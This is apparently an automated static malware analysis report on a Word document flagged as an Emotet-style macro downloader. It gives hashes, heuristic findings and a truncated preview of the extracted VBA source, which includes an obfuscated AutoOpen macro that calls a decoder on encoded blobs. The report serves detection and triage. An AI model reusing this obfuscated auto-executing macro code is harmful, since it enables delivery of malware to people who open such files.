Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 26f2a9b7172f6470…

MALICIOUS

Office (OLE)

164.5 KB Created: 2018-04-11 08:32:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 0ccc7b7948bc0039180172138f9014a3 SHA-1: 38e53723f074f1ed400fb7e034961aeff4f9cc20 SHA-256: 26f2a9b7172f64702c5a816d80a20b7d2855732b4131f240e6a6c74d2665d34c
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and configured to execute a payload using CreateObject. The ClamAV detection and heuristic firings strongly indicate malicious intent, likely to download and execute a second-stage payload. The presence of the AutoOpen macro and the use of CreateObject are common indicators of macro-based malware.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 39974 bytes
SHA-256: 2d4abacbcfc0d148b6cc1861152f39097354308447e2bcf12cb2fcf270ae0543
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 24 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NCzHQsXJMZZmM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
EfPzaz = CByte(uolYwX)
UOVZIT = fMHnwq
iLtwZ = Cos(11855 - Oct(85566 + AswMZf * BnOVbp - CBool(bKnTD)))
Application.Run THLdH + "FfpDWOmzHSOojF" + LcrcYQ, sNdcwu + NLGqwLnjQrj + uKTZb
LTjjJ = CByte(DSIth)
EoTIJ = qEdwB
hqYpfI = Cos(76454 - Oct(74427 + sZssI * RNfkU - CBool(JrGtlA)))
End Sub

Attribute VB_Name = "jWlPSkBS"
Sub NnzFuQ(ObPBs)
qwMjC = CByte(wSwtH)
DfHKaH = AkArk
BsfrS = Cos(42532 - Oct(98538 + KjnCl * cTOQus - CBool(qlEEBH)))
End Sub
Function NLGqwLnjQrj()
On Error Resume Next
dZmqAC = CByte(wcGiL)
DtLTa = BKDzC
mwcVSr = Cos(74801 - Oct(52637 + zFujrI * lGszc - CBool(zumKS)))
MmPuwfEWw = TtJpwT("fL4mADEAOQAyADMANwKjq", 4 + UjiaMQ - UjiaMQ, 15 + UjiaMQ - UjiaMQ)
Mhabk = CByte(OFjaKO)
jVEnRn = EcYzFF
RzhiH = Cos(47668 - Oct(72608 + FZdJi * CsLvdF - CBool(ztGVXk)))
AisdzR = CByte(uiBUN)
tAwWpY = jhPjul
EpKAT = Cos(8925 - Oct(64571 + zHtfC * WMSNoi - CBool(ZITFj)))
TWDsID = TtJpwT("muQA3ADcAOQA3AD4j6c", 3 + kIdWfj - kIdWfj, 13 + kIdWfj - kIdWfj)
OTTMi = CByte(BFEUA)
IQlCp = JWtNUw
GGFij = Cos(82180 - Oct(91336 + ASoduK * AmRrR - CBool(fNZXS)))
cEJpc = CByte(fmNTPN)
wntjlH = FkVjim
YIBHZ = Cos(52893 - Oct(98958 + MJUAHQ * SnCfFl - CBool(BTdKNz)))
wCTKdWj = TtJpwT("8BtSjEAOABhADQAYwA1ADUAYwA5AGYAMQA3AGEANAA3ADMAZgA2ADEAZABiAGEANQA2ADMAOABkADMAOABjADcAMwAwAGYAYwA4ADkAZgA0ADEAYQA2ADUANAAxADgANwA1AGz5", 6 + vNKAwW - vNKAwW, 128 + vNKAwW - vNKAwW)
jdLpcH = CByte(LMpmjL)
jPlAha = hdwhj
GiiPNC = Cos(84950 - Oct(56520 + JKiJAH * NtZZES - CBool(sKjWb)))
ZfUQYj = CByte(iwpACV)
iuTizD = spsFjw
iFXofs = Cos(21177 - Oct(38541 + DSODmX * XhGFB - CBool(JFOAv)))
IDjdLvmudR = TtJpwT("5D8UigANwBmADQAYgAxADMAOAA4AGYAYQA1ADEAMAA3AGYANAAwAGIANwBkADkAZAA0ADYAYQA4ADcAMwA3ADUANQA4ADgAZAAzADMANgAyADEAYwA2AGEAMwAzADMAMQAwADAAYgA4ADMAMABlAGUAMgA1ADMil", 6 + zMItO - zMItO, 153 + zMItO - zMItO)
pcLskO = CByte(tSMWc)
KSPLjA = VXUYZt
IvRafz = Cos(59386 - Oct(59282 + rZioi * zLKdYq - CBool(tufzw)))
WfPVrU = CByte(SuiiQ)
wlUjIT = qKCcHm
KWPja = Cos(45318 - Oct(549 + POUTK * BfozCb - CBool(YEzliL)))
lvhQl = TtJpwT("qAGMAZQBiAGIAMAA5ADcAOQAzADgAZQAzAGEANgA2ADEAZABjAGUANQBhADQAOQBjAGEAYgAzADAAOQAxADAAMwA5AGUAZAAwAGIAMQAzADUAZQBiAGYAZgA2AGMAZQAwADYAZQBjAGYAZAA5AGYAYwAzADgAMQAzADUANQGHfk2GUz", 2 + RHnTr - RHnTr, 166 + RHnTr - RHnTr)
LdnNFQ = CByte(wfwIsZ)
VFPpIF = fOiFKZ
RQvvMH = Cos(12871 - Oct(73747 + GNtsFz * oJBwCw - CBool(vVFDjP)))
RzFfU = CByte(lZfCl)
kVPAjo = UaGLQ
rUIEH = Cos(4975 - Oct(89598 + PBNdY * MdZhH - CBool(adCuu)))
PEYXXpOD = TtJpwT("v1QAyAGUANwBjADZqj3", 3 + IurDi - IurDi, 13 + IurDi - IurDi)
aOFaL = CByte(oSdscU)
zqVUT = WKXqq
ZEqlO = Cos(35655 - Oct(27054 + GcfGo * bpFoTB - CBool(IHiFI)))
CaLko = CByte(iCwfFG)
liIBV = DtVnn
ULhmz = Cos(6417 - Oct(22426 + XavZF * jMqcX - CBool(wEfqXp)))
VzpzSwOT = TtJpwT("YABiADUAYgAxADYAZQBkADAAMgBkADIAMQA1AGYAZQBjADIANQBhADIAKiTLwIIU", 2 + sXqCYO - sXqCYO, 55 + sXqCYO - sXqCYO)
sZIhm = CByte(PURwP)
btiuKn = vHkrCs
vXPfr = Cos(30477 - Oct(18028 + TwPsIA * tOPbfv - CBool(OJVCnu)))
HQYZzZ = CByte(jckqQ)
wsFSOJ = Hofrj
rmiFr = Cos(13157 - Oct(9238 + VAwzz * GpmIVp - CBool(vauDvQ)))
aJksqtTzQpZ = TtJpwT("ZWAAOQA4ADcAOAA2AGQAZgAyAGYAYgAzADUAYQA0ADMAMABiAGYANwAzADcAZAA2AGUAZQBhADYAYwA1ADIANwBkAGMAMgBkADAANABiAGMAZQBjAGQAMwBmADIAZgA5ADQANQA0AGUAOABkAGUAYQAwAGEAYwA3ADkAZB1S58L", 3 + HhFpW - HhFpW, 163 + HhFpW - HhFpW)
VSlhp = CByte(iYBXsj)
XdrGS = UHRCW
ukvMk = Cos(2862 - Oct(92745 + owCPRK * GhoPQ - CBool(iJSinl)))
wndNv = CByte(JqdjA)
mBonu = HCiOk
miUiX = Cos(70341 - Oct(43421 + WLWRDk * KilFIY - CBool(SEFwwt)))
jwtMS = TtJpwT("IGYAYwAxADgANAAzAGIAZQBhADcANQA0ADAAYwA1ADgANQAzAGIAZAA1ADgAYgBmADQAYwA1AGEAYgA5ADUAZQBjADAAYQAyAGMAYwBjADIAZQAzAGMAZQA2AGYANwAyADEAZABjADQAOAA2ADuL40w0F", 2 + vJEQPL - vJEQPL, 145 + vJ
... (truncated)